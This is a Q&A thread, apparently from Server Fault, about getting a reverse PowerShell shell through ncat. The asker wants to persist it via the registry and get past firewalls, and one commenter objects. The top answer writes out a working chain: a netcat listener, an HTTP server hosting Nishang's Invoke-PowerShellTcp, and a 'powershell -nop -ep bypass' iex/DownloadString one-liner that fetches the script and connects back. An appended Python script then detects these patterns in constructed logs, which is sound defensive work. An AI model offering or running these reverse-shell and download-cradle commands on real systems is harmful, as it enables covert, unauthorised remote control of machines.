2

I am using ncat to execute a reverse "cmd" shell from one machine to another without any issues, using the commands:

In my machine:         ncat -l 443
In the remote machine: ncat <my ip> 443 -e cmd

And it all works flawlessly; however, I would very much prefer "powershell" to be executed instead of "cmd". For that I did this:

In my machine:         ncat -l 443
In the remote machine: ncat <my ip> 443 -e powershell

But now a strange thing happens: the PowerShell prompt is given to the remote machine and not mine. This is the output:

In my machine:         Windows PowerShell
                       Copyright 2009 Microsoft Corporation. All rights reserved.   (and it hangs there)
In the remote machine: PS C:\Users\User>      (the shell is actually given to the remote machine)

Is there a way to redirect that prompt to my machine again, and have the "powershell" shell in my machine as I did with the "cmd" shell? I searched for stdout redirection but could not make it work :(

Any help would be very much appreciated.

samsam

  • What problem are you trying to solve, that you couldn't solve using Powershell Remoting? – mfinni Apr 10 '14 at 17:08
  • I would like to have a persistent connection to a remote server in case of an emergency. For that I will place a .bat file in HKLM with the content: ncat 443 -e powershell. And then set a password to that connection so not anyone can use it, but for now I would be very happy if I could just have the reverse powershell shell working =P – samsam Apr 10 '14 at 17:14
  • You're still not answering my question - what problem are you trying to solve? "In an emergency" doesn't tell me anything, because the circumstances in which this would work but PS Remoting wouldn't are eluding me. – mfinni Apr 10 '14 at 17:19
  • Please correct me if I am wrong, but if I use PS Remoting I will have to create a direct connection to the remote machine, and most firewalls could deny access. That is why I would prefer to have a reverse PowerShell connection using ncat. – samsam Apr 10 '14 at 17:23
  • This isn't very professional. You're allowing plaintext over the internet, using port 443 so it superficially looks like HTTPS, to traverse firewalls without the permission of the firewall owner? Because if you had permission, you could get remote access properly. If you were doing this to admin my servers, you wouldn't be working for me anymore. If I'm misunderstanding you, please do let me know. – mfinni Apr 10 '14 at 17:26
  • :( Take it easy man, I am also asking this just for the curiosity and the knowledge. The reason why cmd works but powershell doesn't is intriguing me. I am sure it has to do with some stdout/input redirection, but the way to make it work is for now sadly beyond my knowledge. – samsam Apr 10 '14 at 17:40
  • You've read the Help link, right? This site is intended for professional systems administrators doing work on production systems. You're trying to solve a problem that would make most sysadmins say "Please slow down and start from the top." I agree that the question you're asking is good for curiosity, and I'd even like to know the answer, but it's an inappropriate method of remote access for production systems. – mfinni Apr 10 '14 at 17:46
  • Netcat hooks into a process by launching the process and then redirecting the standard I/O (stdin, stdout, stderr). I would guess that PowerShell is doing something unusual and not using the standard I/O streams, or closing the streams and re-opening new ones or something... – Zoredache Apr 10 '14 at 21:03
  • If you have the authorization to make a persistent connection to the server, then you should be able to use PS remoting anyway. – Michael Hampton Apr 10 '14 at 22:04
  • Any news on this? I tried with nc, the session was opened. But the shell just hangs there without returning any output after I entered a command. – Krypton Mar 25 '18 at 15:43

2 Answers

1

The reason PowerShell hangs on the reverse shell of your attacking machine might be that it is not fully interactive. Try to use PowerShell-based shells like Nishang's Invoke-PowerShellTcp. Download the .ps1 script on your attacking machine, run an HTTP server for the remote host to download the script from, then download it on the remote machine.

Setting up an HTTP server on your attacking machine using either Python 2 or Python 3:

python -m SimpleHTTPServer [port1]
python3 -m http.server [port1]

Also on your attacking machine, run a netcat listener:

nc -lnvp [port2]

Then run this on the Command Prompt (cmd) of the remote machine:

powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient).DownloadString('http://[your attacking machine's IP address]:[port1]/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress [your attacking machine's IP address] -Port [port2]"

The caught reverse shell on your netcat should now be fully interactive.
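From the defender's side, the two commands quoted in this question and answer (ncat launched with -e to hand out cmd or powershell, and powershell.exe started with -nop -ep bypass and an iex/DownloadString cradle) leave a distinctive trace in process-creation telemetry. The script below is an added example, not part of the original thread or of Nishang; it parses a handful of constructed, tab-separated process-creation records (timestamp, host, user, image, command line, parent image; the field layout, host name, user and 10.0.0.5 address are all invented) and flags the patterns shown on this page: netcat-family binaries invoked with an exec option, shells whose parent is a netcat binary, PowerShell download cradles, and execution-policy bypass.

```python
"""Flag process-creation records matching the reverse-shell patterns on this page.

Added example: the log format and all sample records are constructed; adapt
parse_line() to whatever your EDR or Security event 4688 export actually emits.
"""
import ntpath
import re

# Constructed sample records, tab-separated:
# ts, host, user, image path, command line, parent image path.
SAMPLE_LINES = [
    "2014-04-10T17:05:01Z\tWS01\tCORP\\bob\tC:\\Windows\\System32\\cmd.exe"
    "\tcmd.exe /c dir\tC:\\Windows\\explorer.exe",
    "2014-04-10T17:06:12Z\tWS01\tCORP\\bob\tC:\\Tools\\ncat.exe"
    "\tncat 10.0.0.5 443 -e powershell\tC:\\Windows\\System32\\cmd.exe",
    "2014-04-10T17:06:12Z\tWS01\tCORP\\bob"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell\tC:\\Tools\\ncat.exe",
    "2014-04-10T17:09:40Z\tWS01\tCORP\\bob"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell.exe -nop -ep bypass -c \"iex ((New-Object Net.WebClient)"
    ".DownloadString('http://10.0.0.5:8000/Invoke-PowerShellTcp.ps1'));"
    "Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.5 -Port 443\""
    "\tC:\\Windows\\System32\\cmd.exe",
    "2014-04-10T17:15:03Z\tWS01\tCORP\\bob"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell.exe -File C:\\scripts\\backup.ps1"
    "\tC:\\Windows\\System32\\taskeng.exe",
]

NETCAT_IMAGES = {"ncat.exe", "nc.exe", "ncat", "nc"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Ncat's exec options: -e/--exec runs a program directly, -c/--sh-exec via a shell.
NETCAT_EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}
# Download cradle: a WebClient download fed to iex / Invoke-Expression.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile", re.IGNORECASE)
IEX_RE = re.compile(r"\biex\b|Invoke-Expression", re.IGNORECASE)
# -ep, -ex, -exec and -ExecutionPolicy are all accepted spellings of the switch.
BYPASS_RE = re.compile(r"-e(?:p|x\w*)\s+bypass", re.IGNORECASE)


def parse_line(line):
    """Split one tab-separated record into a dict; return None if malformed."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 6:
        return None
    ts, host, user, image, cmdline, parent = parts
    return {"ts": ts, "host": host, "user": user, "image": image,
            "cmdline": cmdline, "parent": parent}


def _basename(path):
    # ntpath handles backslash paths correctly even when run on Linux.
    return ntpath.basename(path).lower()


def classify(rec):
    """Return the rule names a record matches; an empty list means no hit."""
    reasons = []
    image = _basename(rec["image"])
    parent = _basename(rec["parent"])
    cmdline = rec["cmdline"]
    tokens = cmdline.split()
    if image in NETCAT_IMAGES and any(t in NETCAT_EXEC_FLAGS for t in tokens):
        reasons.append("NETCAT_EXEC")
    if image in SHELL_IMAGES and parent in NETCAT_IMAGES:
        reasons.append("CHILD_OF_NETCAT")
    if image in SHELL_IMAGES and CRADLE_RE.search(cmdline) and IEX_RE.search(cmdline):
        reasons.append("DOWNLOAD_CRADLE")
    if image in SHELL_IMAGES and BYPASS_RE.search(cmdline):
        reasons.append("EXEC_POLICY_BYPASS")
    return reasons


def scan(lines):
    """Run classify() over raw log lines; return only records that hit a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append({"ts": rec["ts"], "host": rec["host"],
                         "image": _basename(rec["image"]), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"{hit['ts']} {hit['host']} {hit['image']}: {', '.join(hit['reasons'])}")
```

The parent-process rule is the one that survives renaming of the netcat binary on the child side: whatever the listener is called, cmd.exe or powershell.exe with a non-shell, non-explorer parent that also holds a network socket is worth a look. Note that the plain `ncat -l 443` / `ncat <ip> 443` pair from the question carries no exec flag at all, so only the remote end (the one that spawns the shell) is visible to this rule.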

-1

This should get you started on the right path:

http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

Daniel
  • Please don't post link-only answers. – Massimo Mar 31 '16 at 23:49
  • Yes, link-only answers are low quality, since links can change/go stale/dead, and thus future readers would not be able to learn from your solution. Please edit your post to include the relevant details/code directly. – Castaglia Apr 01 '16 at 01:32